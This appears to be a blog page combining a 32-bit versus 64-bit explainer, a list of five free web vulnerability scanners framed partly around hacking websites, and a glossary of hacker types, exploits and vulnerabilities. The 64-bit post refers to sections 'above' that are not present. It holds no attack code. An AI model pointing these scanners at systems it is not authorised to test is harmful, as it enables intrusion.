In computer architecture, 32-bit integers, memory addresses, or other data units are those that are at most 32 bits (4 octets) wide. Also, 32-bit CPU and ALU architectures are those that are based on registers, address buses, or data buses of that size. 32-bit is also a term given to a generation of microcomputers in which 32-bit microprocessors are the norm.

What is 64 Bit ?
In computer architecture, 64-bit computing is the use of processors that have datapath widths, integer size, and memory addresses widths of 64 bits (eight octets). Also, 64-bit CPU and ALU architectures are those that are based on registers, address buses, or data buses of that size. From the software perspective, 64-bit computing means the use of code with 64-bit virtual memory addresses.

What is the difference between 32-bit and 64-bit ?
In computing, 32-bit and 64-bit describe the width of a processor's registers and addresses. The bit number (usually 8, 16, 32, or 64) determines how large a value a register can hold and therefore how much memory the processor can address directly.
A 64-bit processor is not automatically twice as fast as a 32-bit one: most code is limited by memory, cache and branch behaviour rather than register width. Where it does help is in arithmetic on 64-bit values (one instruction instead of several), in the extra registers the x86-64 instruction set adds, and above all in addressing more than 4 GB of memory. Nowadays all manufacturers ship 64-bit parts, so 64-bit is where computing has gone, but some software still has no 64-bit build. It is important to note that a 64-bit Windows installation can still run 32-bit programs (through WoW64, described above), though not the other way round, and that 32-bit device drivers and browser plug-ins will not load into a 64-bit process.
The other difference between 32-bit and 64-bit is the maximum amount of memory (RAM) that is supported. A 32-bit address is limited to 4 GB of address space, of which a 32-bit Windows process normally sees 2 GB and the operating system typically makes 3 to 3.5 GB of physical RAM usable, whereas a 64-bit system can support far more than 4 GB. This is important for programs used for graphical design, engineering design or video editing, where many calculations are performed to render images, drawings, and video footage. From a security standpoint 64-bit matters too: the much larger address space gives ASLR far more entropy, and 64-bit Windows requires kernel-mode drivers to be signed, two of the prevention strategies listed in the privilege escalation section above.
64-bit processors are now the norm in home computers. Most manufacturers build computers with 64-bit processors because prices have fallen and because most users now run 64-bit operating systems and programs; retailers offer fewer and fewer 32-bit processors and soon may not offer any at all.
In short: if you are buying a new operating system, get the 64-bit version, and if your machine has more than 4 GB of RAM, move to 64-bit now to make use of it.


Top 5 Free Vulnerability Scanner Tools


I have seen people ask how to hack a website without any basic knowledge about hacking. You should know how hacks work: if you want to hack anything in this world, you have to find its weakness and then try to exploit it. Website security is very important because a website contains relevant information about a company, and nowadays website defacement is very common; even script kiddies and newborn hackers can do it. The most common vulnerabilities, such as SQL injection and cross-site scripting, lead to defacement. So if you want to secure your web application, find its vulnerabilities before a hacker finds them.
Below are the top tools for finding vulnerabilities:

1. W3AF -  w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities. This cross-platform tool is available in all of the popular operating systems such as Microsoft Windows, Linux, Mac OS X, FreeBSD and OpenBSD and is written in the Python programming language. Users have the choice between a graphic user interface and a command-line interface. w3af identifies most web application vulnerabilities using more than 130 plug-ins. After identification, vulnerabilities like (blind) SQL injections, OS commanding, remote file inclusions (PHP), cross-site scripting (XSS), and unsafe file uploads, can be exploited in order to gain different types of access to the remote system.

How to use w3af


2. Vega - Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.
Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection. It is available on Kali Linux and Backtrack.

How to use Vega

3. Nikto - Nikto is one of the most popular web security applications to use when you are beginning a web pentesting project. Nikto is a web application scanning tool that searches for misconfigurations, openly accessible web directories and a host of web application vulnerabilities. It is available on popular Linux distributions such as Kali Linux, Backtrack, Gnacktrack, Backbox and others.

How to use Nikto 

4. Zed Attack Proxy (ZAP) - OWASP, or the Open Web Application Security Project, is a worldwide non-profit organisation focused on improving the security of web applications. The Zed Attack Proxy (ZAP) is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. It has automatic scanning functionality and a set of tools that allow you to find vulnerabilities manually.

5. Skipfish - Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.


The Hacker's theory



What is Hacking - Hacking is the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose. The person who is consistently engaging in hacking activities, and has accepted hacking as a lifestyle and philosophy of their choice, is called a hacker.
Computer hacking is the most popular form of hacking nowadays, especially in the field of computer security, but hacking exists in many other forms, such as phone hacking, brain hacking, etc. and it's not limited to either of them.

Who is a Hacker - A hacker is someone who seeks and exploits weaknesses in a computer system or computer network. Hackers may be motivated by a multitude of reasons, such as profit, protest, or challenge.

Types of Hackers:
White Hat - A white hat hacker breaks security for non-malicious reasons, perhaps to test their own security system or while working for a security company which makes security software. The term "white hat" in Internet slang refers to an ethical hacker. This classification also includes individuals who perform penetration tests and vulnerability assessments within a contractual agreement. The EC-Council, also known as the International Council of Electronic Commerce Consultants, is one of those organizations that have developed certifications, course-ware, classes, and online training covering the diverse arena of Ethical Hacking.

Grey Hat - A grey hat hacker is a combination of a black hat and a white hat hacker. A grey hat hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has a security defect, for example. Then they may offer to correct the defect for a fee.

Black Hat - A "black hat" hacker is a hacker who "violates computer security for little reason beyond maliciousness or for personal gain". Black hat hackers form the stereotypical, illegal hacking groups often portrayed in popular culture, and are "the epitome of all that the public fears in a computer criminal". Black hat hackers break into secure networks to destroy data or make the network unusable for those who are authorized to use the network. Black hat hackers also are referred to as the "crackers" within the security industry and by modern programmers. Crackers keep the awareness of the vulnerabilities to themselves and do not notify the general public or manufacturer for patches to be applied. Individual freedom and accessibility is promoted over privacy and security. Once they have gained control over a system, they may apply patches or fixes to the system only to keep their reigning control.

Basic Requirements:
  • Knowledge of networking
  • Ethical Hacking Certification (this will make you a Certified Ethical Hacker)
  • Programming knowledge
  • Read and learn
  • Practice as much as you can

What is an Exploit - An exploit is an attack on a computer system, especially one that takes advantage of a particular vulnerability that the system offers to intruders. Used as a verb, the term refers to the act of successfully making such an attack.

What is a Vulnerability - In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance. Vulnerability is the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw. To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can connect to a system weakness. In this frame, vulnerability is also known as the attack surface.

What is a Bug - A bug is an error, flaw, failure, or fault in a computer program or system that causes it to produce an incorrect or unexpected result, or to behave in unintended ways. Most bugs arise from mistakes and errors made by people in either a program's source code or its design, or in frameworks and operating systems used by such programs, and a few are caused by compilers producing incorrect code. A program that contains a large number of bugs, and/or bugs that seriously interfere with its functionality, is said to be buggy. Reports detailing bugs in a program are commonly known as bug reports, defect reports, fault reports, problem reports, trouble reports, change requests, and so forth.


Disclaimer

This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.
